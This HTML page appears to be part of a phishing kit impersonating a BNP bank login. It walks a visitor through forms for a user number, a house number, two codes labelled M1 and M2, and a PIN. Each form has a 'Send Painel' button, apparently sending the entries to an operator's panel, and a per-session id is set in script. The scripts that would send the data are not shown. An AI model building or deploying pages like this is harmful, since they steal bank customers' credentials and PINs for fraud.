<!DOCTYPE html>
<html lang="pt-br">
  <head>
    <title>PAGE USER - BNP</title>
    <meta charset="utf-8">
  </head>
  <style>
	.border-error{
		color:red;
		border: 1px solid red
	}
	.success{
		color: white;
		background: green
	}
	
	.error{
		color: white;
		background: red
	}
  
  
  </style>
  <body>
    
	<div id="page01">
		<p> Page HOME </p>
		<form id="form_01" name="form_01">

			<span class="shadow-input1"></span>
			<input class="input1" type="text" id="input_number_user" name="input_number_user" placeholder="Number-user">
			
			<input class="input1" type="text" id="input_number_house" name="input_number_house" placeholder="Number-house">
			<span class="shadow-input1"></span>
			
			<button class="contact1-form-btn"> Send Painel </button>
		</form>
	</div>
	
	
	<div id="page02">
		<p> Page M1 </p>
		<form id="form_02" name="form_02">
			<input class="input1" type="text" id="input_m1" name="input_m1" placeholder="M1">
			<button class="contact1-form-btn"> Send Painel </button>
		</form>
	
	</div>
	<div id="page03">
		<p> Page M2 </p>
		<form id="form_03" name="form_03">
			<input class="input1" type="text" id="input_m2" name="input_m2" placeholder="M2">
			<button class="contact1-form-btn"> Send Painel </button>
		</form>
	</div>
	
	<div id="page04">
		<p> Page PIN </p>
		<form id="form_04" name="form_04">
			<input class="input1" type="text" id="input_pin" name="input_pin" placeholder="PIN">
			<button class="contact1-form-btn"> Send Painel </button>
		</form>
	</div>
	
	
	<div id="error">
		<p> Page ERROR </p>
	
	</div>
	<div id="success">
		<p> Page SUCCESS </p>
	
	</div>
	
  </body>
  
	  <!-- PLUGINS JS ------------------------------------------------------------------------>
	<script src='./assets/js/plugins/jquery-2.2.4.min.js'></script>
	<script src='./assets/js/plugins/bootstrap.min.js'></script>
	<script src='./assets/js/plugins/jquery.validate.min.js'></script>
	<script src='./assets/js/plugins/jquery.mask.js'></script>
	<script src="./assets/js/plugins/additional-methods.min.js"></script>
	<!-- PLUGINS JS ------------------------------------------------------------------------>
	<script>
		let uniid = 'ee751ef79819ef44'
	</script>
	<!-- JS -------------------------------------------------------------------------------->
	<script  src="./assets/js/main.js"></script>
	<script  src="./assets/js/functions1.js"></script>
	<script  src="./assets/js/mask.js"></script>
    <!-- JS -------------------------------------------------------------------------------->
	
	
</html>